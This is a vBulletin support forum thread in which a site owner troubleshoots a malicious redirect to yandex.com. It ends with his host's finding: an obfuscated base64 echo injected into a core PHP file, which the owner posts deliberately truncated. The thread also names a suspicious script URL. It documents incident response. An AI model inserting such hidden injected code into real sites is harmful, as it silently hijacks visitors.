Announcement

Collapse
No announcement yet.

My site redirects to yandex.com

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • My site redirects to yandex.com

    Just started happening in the last hour or so. There's another post about this at vb.org from another poster.

    Anyway, when people try to go to my site, they are redirected to a Russian search engine site called "yandex.com".

    It doesn't matter if it is on my main portal page, on the forum home page, in a thread, etc... The entire site is essentially "down" and redirecting people to this other site.

    I'm using vb 3.8.3. I have not installed any mods in over a year. I have disabled a number of mods to see if it would make a difference. It doesn't.

    My site is effectively shut down.

    What is going on and how do I fix?

    My site: www.onlinedebate.net.

    Also, I my users are telling me that it seems as if it is is only happening in Firefox.

    *edit*

    A user reported that if Javascript is turned off in Firefox, there is no redirect.

  • #2
    Plugin manager; check the plugin code perhaps - there could be a malicious injection.
    anders | vbulletin team | check out the new vbulletin facebook app
    Proudly vBulletin'ing since 2001
    Please be my friend!
    http://www.twitter.com/inetskunkworks
    vBulletin Performance Articles:
    Click here to read

    Comment


    • #3
      Sounds like a sql injection attack. Someone somehow got a line of code in that references the javascript.

      Using Firebug, I found a reference to **DO NOT CLICK** http://js.static.yandex.com/jquery/1.3.2 on your site. I'm working on trying to figure out exactly where it's at.

      Comment


      • #4
        Wouldn't just disabling all products/plugins work? That way it could be weeded out?

        Comment


        • #5
          Looks to be a trojan: http://www.threatexpert.com/report.a...d1c7c85f3d9697

          Comment


          • #6
            So is it a flaw in vb or from the server/host?

            Comment


            • #7
              Possibly related to this: http://www.vbulletin.com/forum/showt...ile2store.info

              Comment


              • #8
                Server/Host
                Gentoo Geek

                Comment


                • #9
                  how can you be sure it's a server/host issue?

                  Comment


                  • #10
                    Originally posted by Apokalupsis View Post
                    how can you be sure it's a server/host issue?
                    It's not. Not at all. Read the links I posted.

                    Comment


                    • #11
                      Well, I was responding to snakes1100. OK, so he's wrong.

                      I don't know what I'm supposed to see in the "threatsexpert" link. I don't know what it means nor what to do about it.

                      The 2nd link that you posted does not appear to be related to my issue. I don't have vbseo, and it redirects regardless if coming from Google.

                      Still need vb tech to help.

                      Comment


                      • #12
                        The excellent support team at Hostgator found the problem and removed it. I highly recommend them for a hosting company btw, they are great with shared vb communities.

                        Anyway, here it is (with some of the code removed so it isn't harmful):

                        At the bottom of includes/functions_forumlist.php
                        Code:
                        define('SITE_COLOR', 'PGlmcmFtZSBzcmM9IremovedforsafetyVib3JkZXI9IjAiPgo8L2$
                        echo base64_decode(SITE_COLOR);
                        They said that this isn't the first time they've ran into this.
                        Last edited by Apokalupsis; Mon 12th Jul '10, 4:44pm.

                        Comment


                        • #13
                          Originally posted by Apokalupsis View Post
                          The excellent support team at Hostgator found the problem and removed it. I highly recommend them for a hosting company btw, they are great with shared vb communities.

                          Anyway, here it is (with some of the code removed so it isn't harmful):

                          At the bottom of includes/functions_forumlist.php
                          Code:
                          define('SITE_COLOR', 'PGlmcmFtZSBzcmM9IremovedforsafetyVib3JkZXI9IjAiPgo8L2$
                          echo base64_decode(SITE_COLOR);
                          They said that this isn't the first time they've ran into this.
                          Any ideas on how this was done? Admincp?

                          Comment


                          • #14
                            Absolutely no idea. They just said to update vb and any and all mods I have installed.

                            Comment


                            • #15
                              Originally posted by Apokalupsis View Post
                              The excellent support team at Hostgator found the problem and removed it. I highly recommend them for a hosting company btw, they are great with shared vb communities.

                              Anyway, here it is (with some of the code removed so it isn't harmful):

                              At the bottom of includes/functions_forumlist.php
                              Code:
                              define('SITE_COLOR', 'PGlmcmFtZSBzcmM9IremovedforsafetyVib3JkZXI9IjAiPgo8L2$
                              echo base64_decode(SITE_COLOR);
                              They said that this isn't the first time they've ran into this.

                              Interesting.... How in the world did they get it there?

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X